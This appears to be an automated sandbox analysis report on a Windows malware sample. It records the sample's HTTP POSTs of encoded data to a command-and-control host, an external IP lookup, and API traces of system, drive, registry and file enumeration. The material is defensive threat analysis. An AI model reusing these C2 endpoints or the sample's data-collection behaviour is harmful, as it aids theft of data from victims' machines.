                                                          Data Ascii: 2bc\/8AMj\/EduOf7vhBq\/K79vz4x\/D742fGXwz4n+GOu\/8ACS+HdN+GGieHrzUzpet6N5etWvinxnqVzZLZ6\/pml30ghstW06U3KWxtXNwY45nkhmVP9KP2Wvg99IDwz+k5TzHjLwp8YeAeEcz4G4oy\/N8w4n4E4z4X4dxlaMcFisrweYYvNsqwOXVqyxtGNbAUa9SVRV4OVCPNzH+cf7SXxW8D\/EP6O1XAcJeJfhTxv
                                                          Dec 28, 2024 09:42:52.482966900 CET2472OUTData Raw: 6c 42 30 46 61 54 6d 4e 6e 32 46 50 4d 34 48 39 44 2b 46 48 79 66 4a 73 68 32 52 5c 2f 36 52 5c 2f 7a 39 66 30 5c 2f 7a 2b 56 50 5c 2f 41 4f 57 6a 70 50 38 41 4a 36 52 35 5c 2f 77 42 62 5c 2f 6e 46 51 2b 59 5c 2f 38 53 58 50 2b 74 38 33 5c 2f 41
                                                          Data Ascii: lB0FaTmNn2FPM4H9D+FHyfJsh2R\/6R\/z9f0\/z+VP\/AOWjpP8AJ6R5\/wBb\/nFQ+Y\/8SXP+t83\/AFv7j\/P0rb3\/AO7+IDMJ8\/zyf88pfM6Y\/wA\/570\/7vyfu\/L\/ANUcS+3+fbBoWQx722B3\/wBV\/wDr\/wA+9MaRPnd0t9\/bzOYKoBnmPId+y3\/d\/nN\/nuPf2p8m+Te\/+p8qLzf+Prz\/ADvW69\/\
                                                          Dec 28, 2024 09:42:52.482990026 CET2472OUTData Raw: 45 64 44 30 66 78 62 5a 65 45 4a 35 76 69 76 38 48 66 41 2b 72 66 45 76 34 35 36 68 2b 7a 68 38 4b 66 43 58 6a 33 56 50 69 6c 61 2b 4a 66 69 5a 38 59 4c 48 52 66 41 2b 74 52 65 46 66 44 73 5c 2f 67 72 34 51 65 4f 5c 2f 42 75 69 5c 2f 77 42 70 72
                                                          Data Ascii: EdD0fxbZeEJ5viv8HfA+rfEv456h+zh8KfCXj3VPila+JfiZ8YLHRfA+tReFfDs\/gr4QeO\/Bui\/wBpr8RfCmm6dq3j\/wAY+C9GbU9R2XmoWdjDLfr4t4e+K3gbxDa6TNaeL\/CL397Bqn9t+Hk1PV7fXvBeqaVq9\/pUuheJ4tc8O6HpMupTrZLqUMnhXWPFGmR2N5bw3uo2mrxX2l2f6NlfiBwBWzevwhlGd5as0yit\/Z
                                                          Dec 28, 2024 09:42:52.602093935 CET2472OUTData Raw: 49 75 72 57 71 54 6a 54 6f 77 6e 55 6b 6f 76 35 58 68 58 67 48 6a 48 6a 65 4f 5a 54 34 55 79 44 48 5a 33 44 4a 73 50 48 47 5a 74 55 77 69 70 4b 6c 6c 32 44 63 31 42 34 76 47 56 61 31 57 6c 54 6f 59 57 6d 33 7a 56 38 52 55 6c 47 6a 68 36 61 6c 56
                                                          Data Ascii: IurWqTjTownUkov5XhXgHjHjeOZT4UyDHZ3DJsPHGZtUwipKll2Dc1B4vGVa1WlToYWm3zV8RUlGjh6alVrzp0oymq9fbH7JX7cvxE\/Y+03xxp3gPwj4J8TL49vtBvdWk8Yxa\/P9lPhyDVYLBNOTQ9b0Qx+YNavWu2upLsS7bUQpb+VKbj5xtfh54d1rQ\/DmueEf2iv2bvGSeMfjP4e\/Z88Iabpt7+0t4b1PxZ8XfEukTa\
                                                          Dec 28, 2024 09:42:53.691572905 CET212INHTTP/1.0 503 Service Unavailable
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.44973381.29.149.125802336C:\Users\user\Desktop\QMtCX5RLOP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 28, 2024 09:42:54.861097097 CET284OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                          Host: home.fiveth5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 143
                                                          Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                          Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                          Dec 28, 2024 09:42:56.168260098 CET212INHTTP/1.0 503 Service Unavailable
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.44973034.226.108.1554432336C:\Users\user\Desktop\QMtCX5RLOP.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-28 08:42:47 UTC52OUTGET /ip HTTP/1.1
                                                          Host: httpbin.org
                                                          Accept: */*
                                                          2024-12-28 08:42:48 UTC224INHTTP/1.1 200 OK
                                                          Date: Sat, 28 Dec 2024 08:42:47 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 31
                                                          Connection: close
                                                          Server: gunicorn/19.9.0
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Credentials: true
                                                          2024-12-28 08:42:48 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                          Data Ascii: { "origin": "8.46.123.189"}


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:03:42:42
                                                          Start date:28/12/2024
                                                          Path:C:\Users\user\Desktop\QMtCX5RLOP.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\QMtCX5RLOP.exe"
                                                          Imagebase:0xd40000
                                                          File size:4'480'512 bytes
                                                          MD5 hash:3657BC0028F37DA206A1530AA895F62E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:4%
                                                            Dynamic/Decrypted Code Coverage:24.6%
                                                            Signature Coverage:15.8%
                                                            Total number of Nodes:455
                                                            Total number of Limit Nodes:59
                                                            execution_graph 71442 e0a080 71445 e09740 71442->71445 71444 e0a09b 71446 e09780 71445->71446 71450 e0975d 71445->71450 71447 e09925 RegOpenKeyExA 71446->71447 71446->71450 71448 e0995a RegQueryValueExA 71447->71448 71447->71450 71449 e09986 RegCloseKey 71448->71449 71449->71450 71450->71444 71103 d431d7 71104 d431f4 71103->71104 71105 d43200 71104->71105 71109 d43223 71104->71109 71110 d415b0 _lock 71105->71110 71107 d4321e 71108 d432dc CloseHandle 71108->71107 71109->71108 71110->71107 71111 d42f17 71119 d42f2c 71111->71119 71112 d431d3 71113 d42fb3 RegOpenKeyExA 71113->71119 71114 d4315c RegEnumKeyExA 71115 d431b2 RegCloseKey 71114->71115 71114->71119 71115->71119 71116 d43046 RegOpenKeyExA 71117 d43089 RegQueryValueExA 71116->71117 71116->71119 71118 d4313b RegCloseKey 71117->71118 71117->71119 71118->71119 71119->71112 71119->71113 71119->71114 71119->71116 71119->71118 71451 d4f7b0 71452 d4f97a 71451->71452 71453 d4f7c3 71451->71453 71453->71452 71454 d4f932 71453->71454 71474 d4fec0 7 API calls 71453->71474 71459 d7cd80 71454->71459 71457 d4f942 71458 d4f9bb WSACloseEvent 71457->71458 71458->71452 71460 d7d0e5 71459->71460 71462 d7cd9a 71459->71462 71460->71457 71461 d7ce6b 71463 d7d064 71461->71463 71473 d7cf4b 71461->71473 71476 d7dc30 socket ioctlsocket connect getsockname closesocket 71461->71476 71462->71460 71462->71461 71475 d7dc30 socket ioctlsocket connect getsockname closesocket 71462->71475 71464 d7d0b4 71463->71464 71479 d7de00 socket ioctlsocket connect getsockname closesocket 71463->71479 71480 d5f6c0 7 API calls 71464->71480 71471 d7d016 71471->71463 71478 d7de00 socket ioctlsocket connect getsockname closesocket 71471->71478 71472 d56fa0 select 71472->71473 71473->71471 71473->71472 71477 d7e130 socket ioctlsocket connect getsockname closesocket 71473->71477 71474->71453 71475->71462 71476->71461 71477->71473 71478->71471 71479->71463 71480->71460 71120 d78b50 71121 d78b6b 71120->71121 71138 d78bb5 71120->71138 71122 d78bf3 71121->71122 71123 d78b8f 71121->71123 71121->71138 71140 d7a550 71122->71140 71159 d56e40 select 71123->71159 71126 d78bfc 71130 d78c35 71126->71130 71131 d78c1f connect 71126->71131 71137 d78cb2 71126->71137 71126->71138 71127 d78cd9 SleepEx getsockopt 71128 d78d18 71127->71128 71132 d78d43 71128->71132 71128->71137 71129 d7a150 getsockname 71136 d78dff 71129->71136 71155 d7a150 71130->71155 71131->71130 71135 d7a150 getsockname 71132->71135 71135->71138 71136->71138 71160 d478b0 closesocket 71136->71160 71137->71129 71137->71136 71137->71138 71139 d78ba1 71139->71127 71139->71137 71139->71138 71141 d7a575 71140->71141 71145 d7a597 71141->71145 71162 d475e0 71141->71162 71143 d478b0 closesocket 71144 d7a713 71143->71144 71144->71126 71146 d7a811 setsockopt 71145->71146 71151 d7a83b 71145->71151 71153 d7a69b 71145->71153 71146->71151 71148 d7af56 71149 d7af5d 71148->71149 71148->71153 71149->71144 71150 d7a150 getsockname 71149->71150 71150->71144 71151->71153 71154 d7abe1 71151->71154 71168 d76be0 8 API calls 71151->71168 71153->71143 71153->71144 71154->71153 71167 da67e0 ioctlsocket 71154->71167 71156 d7a15f 71155->71156 71158 d7a1d0 71155->71158 71157 d7a181 getsockname 71156->71157 71156->71158 71157->71158 71158->71139 71159->71139 71161 d478c5 71160->71161 71161->71138 71163 d47607 socket 71162->71163 71165 d475ef 71162->71165 71164 d4762b 71163->71164 71164->71145 71165->71163 71166 d47643 71165->71166 71166->71145 71167->71148 71168->71154 71481 d795b0 71482 d795c8 71481->71482 71484 d795fd 71481->71484 71483 d7a150 getsockname 71482->71483 71482->71484 71483->71484 71485 d76ab0 71486 d76ad5 71485->71486 71487 d76bb4 71486->71487 71489 d56fa0 select 71486->71489 71488 df5ed0 7 API calls 71487->71488 71491 d76ba9 71488->71491 71490 d76b54 71489->71490 71490->71487 71490->71491 71492 d76b5d 71490->71492 71492->71491 71494 df5ed0 71492->71494 71497 df5a50 71494->71497 71496 df5ee5 71496->71492 71498 df5a58 71497->71498 71504 df5ea0 71497->71504 71499 df5b50 71498->71499 71509 df5a99 71498->71509 71510 df5b88 71498->71510 71502 df5b7a 71499->71502 71503 df5eb4 71499->71503 71499->71510 71500 df5e96 71530 e09480 socket ioctlsocket connect getsockname closesocket 71500->71530 71520 df70a0 71502->71520 71531 df6f10 socket ioctlsocket connect getsockname closesocket 71503->71531 71504->71496 71507 df5ec2 71507->71507 71509->71510 71513 df70a0 6 API calls 71509->71513 71527 df6f10 socket ioctlsocket connect getsockname closesocket 71509->71527 71514 df5cae 71510->71514 71528 df5ef0 socket ioctlsocket connect getsockname 71510->71528 71513->71509 71514->71500 71516 e0a920 71514->71516 71529 e09320 socket ioctlsocket connect getsockname closesocket 71514->71529 71517 e0a944 71516->71517 71518 e0a94b 71517->71518 71519 e0a977 send 71517->71519 71518->71514 71519->71514 71523 df70ae 71520->71523 71522 df71a7 71522->71510 71523->71522 71524 df717f 71523->71524 71532 e0a8c0 71523->71532 71536 df71c0 socket ioctlsocket connect getsockname 71523->71536 71524->71522 71537 e09320 socket ioctlsocket connect getsockname closesocket 71524->71537 71527->71509 71528->71510 71529->71514 71530->71504 71531->71507 71533 e0a903 recvfrom 71532->71533 71534 e0a8e6 71532->71534 71535 e0a8ed 71533->71535 71534->71533 71534->71535 71535->71523 71536->71523 71537->71522 71169 d4255d 71214 10c9f70 71169->71214 71171 d4256c GetSystemInfo 71172 d42589 71171->71172 71173 d425a0 GlobalMemoryStatusEx 71172->71173 71174 d425ec 71173->71174 71216 6e50199 71174->71216 71221 6e50258 71174->71221 71225 6e5005c 71174->71225 71231 6e5001e 71174->71231 71237 6e5029d 71174->71237 71241 6e5011d 71174->71241 71245 6e50014 71174->71245 71251 6e50093 71174->71251 71257 6e50109 71174->71257 71261 6e5004a 71174->71261 71268 6e50349 GetLogicalDrives 71174->71268 71270 6e50149 71174->71270 71274 6e5024f 71174->71274 71278 6e50209 71174->71278 71282 6e501cd 71174->71282 71286 6e5018c 71174->71286 71290 6e50282 71174->71290 71294 6e500cd 71174->71294 71300 6e500ba 71174->71300 71304 6e50000 71174->71304 71310 6e502f8 71174->71310 71314 6e501bb 71174->71314 71318 6e50332 71174->71318 71322 6e502bd 71174->71322 71326 6e5006b 71174->71326 71332 6e50234 71174->71332 71336 6e501ef 71174->71336 71340 6e50129 71174->71340 71344 6e50167 71174->71344 71348 6e500e6 71174->71348 71175 d42762 71178 d427d6 KiUserCallbackDispatcher 71175->71178 71176 d4263c GetDriveTypeA 71177 d42655 GetDiskFreeSpaceExA 71176->71177 71179 d4261b 71176->71179 71177->71179 71180 d427f8 71178->71180 71179->71175 71179->71176 71181 d428d9 FindFirstFileW 71180->71181 71182 d42906 FindNextFileW 71181->71182 71183 d42928 71181->71183 71182->71182 71182->71183 71215 10c9f7d 71214->71215 71215->71171 71215->71215 71217 6e5014a 71216->71217 71218 6e501ad GetLogicalDrives 71216->71218 71217->71179 71220 6e50379 71218->71220 71222 6e50289 GetLogicalDrives 71221->71222 71224 6e50379 71222->71224 71226 6e50030 71225->71226 71227 6e5004a GetLogicalDrives 71226->71227 71228 6e50098 GetLogicalDrives 71226->71228 71227->71226 71230 6e50379 71228->71230 71233 6e50030 71231->71233 71232 6e5004a 2 API calls 71232->71233 71233->71232 71234 6e50098 GetLogicalDrives 71233->71234 71236 6e50379 71234->71236 71238 6e502d0 GetLogicalDrives 71237->71238 71240 6e50379 71238->71240 71242 6e50121 GetLogicalDrives 71241->71242 71244 6e50379 71242->71244 71247 6e50027 71245->71247 71246 6e5004a 2 API calls 71246->71247 71247->71246 71248 6e50098 GetLogicalDrives 71247->71248 71250 6e50379 71248->71250 71253 6e50030 71251->71253 71252 6e5004a 2 API calls 71252->71253 71253->71251 71253->71252 71254 6e50098 GetLogicalDrives 71253->71254 71256 6e50379 71254->71256 71258 6e5010d GetLogicalDrives 71257->71258 71260 6e50379 71258->71260 71262 6e5005c GetLogicalDrives 71261->71262 71263 6e50030 71262->71263 71264 6e5004a GetLogicalDrives 71263->71264 71265 6e50098 GetLogicalDrives 71263->71265 71264->71263 71267 6e50379 71265->71267 71269 6e50379 71268->71269 71271 6e50150 GetLogicalDrives 71270->71271 71273 6e50379 71271->71273 71275 6e5025c GetLogicalDrives 71274->71275 71277 6e50379 71275->71277 71279 6e5020d GetLogicalDrives 71278->71279 71281 6e50379 71279->71281 71283 6e501ff GetLogicalDrives 71282->71283 71285 6e50379 71283->71285 71287 6e50190 GetLogicalDrives 71286->71287 71289 6e50379 71287->71289 71291 6e502aa GetLogicalDrives 71290->71291 71293 6e50379 71291->71293 71296 6e50030 71294->71296 71295 6e5004a 2 API calls 71295->71296 71296->71295 71297 6e50098 GetLogicalDrives 71296->71297 71299 6e50379 71297->71299 71301 6e500c5 GetLogicalDrives 71300->71301 71303 6e50379 71301->71303 71306 6e50016 71304->71306 71305 6e5004a 2 API calls 71305->71306 71306->71305 71307 6e50098 GetLogicalDrives 71306->71307 71309 6e50379 71307->71309 71311 6e502fd GetLogicalDrives 71310->71311 71313 6e50379 71311->71313 71315 6e50160 GetLogicalDrives 71314->71315 71317 6e50379 71315->71317 71319 6e5033e GetLogicalDrives 71318->71319 71321 6e50379 71319->71321 71323 6e502d1 GetLogicalDrives 71322->71323 71325 6e50379 71323->71325 71327 6e50030 71326->71327 71329 6e50098 GetLogicalDrives 71326->71329 71328 6e5004a 2 API calls 71327->71328 71327->71329 71328->71327 71331 6e50379 71329->71331 71333 6e5025b GetLogicalDrives 71332->71333 71335 6e50379 71333->71335 71337 6e501b0 GetLogicalDrives 71336->71337 71339 6e50379 71337->71339 71341 6e50131 GetLogicalDrives 71340->71341 71343 6e50379 71341->71343 71345 6e50190 GetLogicalDrives 71344->71345 71347 6e50379 71345->71347 71349 6e5010d GetLogicalDrives 71348->71349 71351 6e50379 71349->71351 71352 d43d5e 71357 d43d30 71352->71357 71353 d43d90 71361 d4fcb0 7 API calls 71353->71361 71356 d43dc1 71357->71352 71357->71353 71358 d50ab0 71357->71358 71362 d505b0 71358->71362 71360 d50acd 71360->71357 71361->71356 71363 d507c7 71362->71363 71364 d505bd 71362->71364 71363->71360 71364->71363 71365 d507ef 71364->71365 71366 d50707 WSAEventSelect 71364->71366 71372 d476a0 71364->71372 71365->71363 71370 d50847 71365->71370 71376 d56fa0 71365->71376 71366->71363 71366->71364 71369 d509e8 WSAEnumNetworkEvents 71369->71370 71371 d509d0 WSAEventSelect 71369->71371 71370->71363 71370->71369 71370->71371 71371->71369 71371->71370 71373 d476e6 send 71372->71373 71374 d476c0 71372->71374 71375 d476c9 71373->71375 71374->71373 71374->71375 71375->71364 71377 d56fd4 71376->71377 71379 d56feb 71376->71379 71378 d57207 select 71377->71378 71377->71379 71378->71379 71379->71370 71538 d429ff FindFirstFileA 71539 d42a31 71538->71539 71540 d42a5c RegOpenKeyExA 71539->71540 71541 d42a93 71540->71541 71542 d42ade CharUpperA 71541->71542 71543 d42b0a 71542->71543 71544 d42bf9 QueryFullProcessImageNameA 71543->71544 71545 d42c3b CloseHandle 71544->71545 71547 d42c64 71545->71547 71546 d42df1 CloseHandle 71548 d42e23 71546->71548 71547->71546 71380 10cb180 Sleep 71549 11c7830 71562 10cdd50 71549->71562 71551 11c7866 71552 11c785a 71552->71551 71565 10d12c0 71552->71565 71554 11c78a6 71555 11c789a 71555->71554 71556 11c7906 71555->71556 71557 11c7950 71555->71557 71558 11c7944 71556->71558 71570 10cb500 _lock 71556->71570 71569 10cb500 _lock 71557->71569 71561 11c7979 71571 10d7430 71562->71571 71564 10cdd61 71564->71552 71566 10d12cc 71565->71566 71575 10ce050 71566->71575 71568 10d12fa 71568->71555 71569->71561 71570->71561 71573 10d7444 71571->71573 71572 10d7458 71572->71564 71573->71572 71574 10d747c _lock 71573->71574 71574->71564 71582 10ce09d 71575->71582 71589 10ce503 71575->71589 71576 10cfee7 71594 10cdff0 ungetc 71576->71594 71577 10ce18e 71579 10ced90 ungetc 71577->71579 71585 10ce1a6 71577->71585 71579->71585 71580 10d0250 ungetc 71580->71589 71581 10d11a4 ungetc 71581->71589 71582->71577 71582->71585 71587 10ce388 71582->71587 71588 10ce243 71582->71588 71582->71589 71583 10d0742 ungetc 71583->71585 71584 10d08d7 ungetc 71584->71589 71585->71568 71587->71585 71587->71589 71593 10d00b8 ungetc 71587->71593 71588->71583 71588->71585 71589->71576 71589->71580 71589->71581 71589->71584 71589->71585 71589->71588 71591 10d0006 ungetc 71589->71591 71592 10d0e3e ungetc 71589->71592 71595 10cdff0 ungetc 71589->71595 71596 10cb1a0 islower islower 71589->71596 71591->71589 71592->71589 71593->71587 71594->71585 71595->71589 71596->71589 71597 d51139 71598 d51148 71597->71598 71600 d51527 71598->71600 71602 d50f00 71598->71602 71605 d4fec0 7 API calls 71598->71605 71600->71602 71606 d522d0 7 API calls 71600->71606 71603 d50f7b 71602->71603 71607 d7d4d0 socket ioctlsocket connect getsockname closesocket 71602->71607 71605->71600 71606->71602 71607->71602 71381 6e903b9 Process32FirstW 71382 6e903d1 71381->71382 71608 6ea0419 71609 6ea03da Process32NextW 71608->71609 71611 6ea047e 71609->71611 71612 d5d5e0 71613 d5d652 WSAStartup 71612->71613 71614 d5d5f0 71612->71614 71613->71614 71383 d7b3c0 71384 d7b3ee 71383->71384 71385 d7b3cb 71383->71385 71387 d476a0 send 71385->71387 71389 d79290 71385->71389 71386 d7b3ea 71387->71386 71390 d476a0 send 71389->71390 71391 d792e5 71390->71391 71392 d79392 71391->71392 71393 d79335 WSAIoctl 71391->71393 71392->71386 71393->71392 71394 d79366 71393->71394 71394->71392 71395 d79371 setsockopt 71394->71395 71395->71392 71396 d7e400 71397 d7e459 71396->71397 71399 d7e412 71396->71399 71400 d768b0 socket ioctlsocket connect getsockname closesocket 71399->71400 71400->71397 71401 d7b400 71402 d7b425 71401->71402 71403 d7b40b 71401->71403 71406 d47770 71403->71406 71404 d7b421 71407 d477b6 recv 71406->71407 71408 d47790 71406->71408 71409 d47799 71407->71409 71408->71407 71408->71409 71409->71404 71410 d413c9 71413 d41160 71410->71413 71412 d41231 SetUnhandledExceptionFilter 71412->71413 71413->71412 71414 d413a1 71413->71414 71415 10c8a20 12 API calls 71413->71415 71415->71413 71416 df3c00 71417 df3c23 71416->71417 71419 df3c0d 71416->71419 71417->71419 71420 e0b180 71417->71420 71426 e0b19b 71420->71426 71427 e0b2e3 71420->71427 71423 e0b2a9 getsockname 71437 e0b020 71423->71437 71425 e0b020 closesocket 71425->71426 71426->71423 71426->71425 71426->71427 71428 e0af30 71426->71428 71432 e0b060 71426->71432 71427->71419 71429 e0af63 socket 71428->71429 71430 e0af4c 71428->71430 71429->71426 71430->71429 71431 e0af52 71430->71431 71431->71426 71436 e0b080 71432->71436 71433 e0b0b0 connect 71434 e0b0bf WSAGetLastError 71433->71434 71435 e0b0ea 71434->71435 71434->71436 71435->71426 71436->71433 71436->71434 71436->71435 71438 e0b052 71437->71438 71439 e0b029 71437->71439 71438->71426 71440 e0b04b closesocket 71439->71440 71441 e0b03e 71439->71441 71440->71438 71441->71426 71615 df4720 71619 df4728 71615->71619 71616 df4733 71618 df4774 71619->71616 71626 df476c 71619->71626 71627 df5540 socket ioctlsocket connect getsockname closesocket 71619->71627 71621 df482e 71621->71626 71628 df9270 71621->71628 71623 df4860 71633 df4950 71623->71633 71625 df4878 71626->71625 71641 df30a0 socket ioctlsocket connect getsockname closesocket 71626->71641 71627->71621 71642 dfa440 71628->71642 71630 df9297 71631 df92ab 71630->71631 71678 dfbbe0 socket ioctlsocket connect getsockname closesocket 71630->71678 71631->71623 71634 df4966 71633->71634 71639 df49b9 71634->71639 71640 df49c5 71634->71640 71680 dfb590 if_indextoname 71634->71680 71636 df4a3e 71636->71640 71681 dfbbe0 socket ioctlsocket connect getsockname closesocket 71636->71681 71637 df4aa0 gethostname 71637->71639 71637->71640 71639->71637 71639->71640 71640->71626 71641->71618 71643 dfa46b 71642->71643 71644 dfa4db 71643->71644 71645 dfa48b GetAdaptersAddresses 71643->71645 71646 dfaa03 RegOpenKeyExA 71644->71646 71657 dfad14 71644->71657 71662 dfa4a6 71645->71662 71676 dfa520 71645->71676 71647 dfaa27 RegQueryValueExA 71646->71647 71648 dfab70 RegOpenKeyExA 71646->71648 71649 dfaacc RegQueryValueExA 71647->71649 71650 dfaa71 71647->71650 71651 dfac34 RegOpenKeyExA 71648->71651 71652 dfab90 71648->71652 71654 dfab0e 71649->71654 71655 dfab66 RegCloseKey 71649->71655 71650->71649 71659 dfaa85 RegQueryValueExA 71650->71659 71653 dfacf8 RegOpenKeyExA 71651->71653 71675 dfac54 71651->71675 71652->71651 71656 dfad56 RegEnumKeyExA 71653->71656 71653->71657 71654->71655 71663 dfab1e RegQueryValueExA 71654->71663 71655->71648 71656->71657 71660 dfad9b 71656->71660 71657->71630 71658 dfa4f3 GetAdaptersAddresses 71670 dfa505 71658->71670 71658->71676 71667 dfaab3 71659->71667 71661 dfae16 RegOpenKeyExA 71660->71661 71664 dfaddf RegEnumKeyExA 71661->71664 71665 dfae34 RegQueryValueExA 71661->71665 71662->71658 71662->71676 71669 dfab4c 71663->71669 71664->71657 71664->71661 71668 dfaf43 RegQueryValueExA 71665->71668 71677 dfadaa 71665->71677 71666 dfa527 GetAdaptersAddresses 71666->71676 71667->71649 71672 dfb052 RegQueryValueExA 71668->71672 71668->71677 71669->71655 71670->71666 71670->71676 71673 dfadc7 RegCloseKey 71672->71673 71672->71677 71673->71664 71674 dfafa0 RegQueryValueExA 71674->71677 71675->71653 71676->71644 71679 dfb830 if_indextoname 71676->71679 71677->71668 71677->71672 71677->71673 71677->71674 71678->71631 71679->71644 71680->71636 71681->71639

                                                            Executed Functions

                                                            Function 00D4255D Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 282fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 833 d4255d-d42614 call 10c9f70 GetSystemInfo call 11c9af0 call 11c9ce0 GlobalMemoryStatusEx call 11c9af0 call 11c9ce0 915 d42619 call 6e50167 833->915 916 d42619 call 6e500e6 833->916 917 d42619 call 6e501ef 833->917 918 d42619 call 6e50129 833->918 919 d42619 call 6e5006b 833->919 920 d42619 call 6e50234 833->920 921 d42619 call 6e50332 833->921 922 d42619 call 6e502bd 833->922 923 d42619 call 6e502f8 833->923 924 d42619 call 6e501bb 833->924 925 d42619 call 6e500ba 833->925 926 d42619 call 6e50000 833->926 927 d42619 call 6e50282 833->927 928 d42619 call 6e500cd 833->928 929 d42619 call 6e501cd 833->929 930 d42619 call 6e5018c 833->930 931 d42619 call 6e5024f 833->931 932 d42619 call 6e50209 833->932 933 d42619 call 6e50349 833->933 934 d42619 call 6e50149 833->934 935 d42619 call 6e50109 833->935 936 d42619 call 6e5004a 833->936 937 d42619 call 6e50014 833->937 938 d42619 call 6e50093 833->938 939 d42619 call 6e5029d 833->939 940 d42619 call 6e5011d 833->940 941 d42619 call 6e5005c 833->941 942 d42619 call 6e5001e 833->942 943 d42619 call 6e50199 833->943 944 d42619 call 6e50258 833->944 844 d4261b-d42620 845 d42626-d42637 call 11c98f0 844->845 846 d4277c-d42904 call 11c9af0 call 11c9ce0 KiUserCallbackDispatcher call 11c9af0 call 11c9ce0 call 11c9af0 call 11c9ce0 call 10c8e38 call 10c8be0 call 10c8bd0 FindFirstFileW 844->846 851 d42754-d4275c 845->851 893 d42906-d42926 FindNextFileW 846->893 894 d42928-d4292c 846->894 853 d42762-d42777 call 11c9ce0 851->853 854 d4263c-d4264f GetDriveTypeA 851->854 853->846 856 d42655-d42685 GetDiskFreeSpaceExA 854->856 857 d42743-d42751 call 10c8b98 854->857 856->857 860 d4268b-d4273e call 11c9bc0 call 11c9c50 call 11c9ce0 call 11c99e0 call 11c9ce0 call 11c99e0 call 11c9ce0 call 11c8050 856->860 857->851 860->857 893->893 893->894 895 d42932-d4296f call 11c9af0 call 11c9ce0 call 10c8e78 894->895 896 d4292e 894->896 902 d42974-d42979 895->902 896->895 903 d429a9-d429fe call 10ca2b0 call 11c9af0 call 11c9ce0 902->903 904 d4297b-d429a4 call 11c9af0 call 11c9ce0 902->904 904->903 915->844 916->844 917->844 918->844 919->844 920->844 921->844 922->844 923->844 924->844 925->844 926->844 927->844 928->844 929->844 930->844 931->844 932->844 933->844 934->844 935->844 936->844 937->844 938->844 939->844 940->844 941->844 942->844 943->844 944->844
                                                            APIs
                                                            • GetSystemInfo.KERNELBASE ref: 00D42579
                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 00D425CC
                                                            • GetDriveTypeA.KERNELBASE ref: 00D42647
                                                            • GetDiskFreeSpaceExA.KERNELBASE ref: 00D4267E
                                                            • KiUserCallbackDispatcher.NTDLL ref: 00D427E2
                                                            • FindFirstFileW.KERNELBASE ref: 00D428F8
                                                            • FindNextFileW.KERNELBASE ref: 00D4291F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
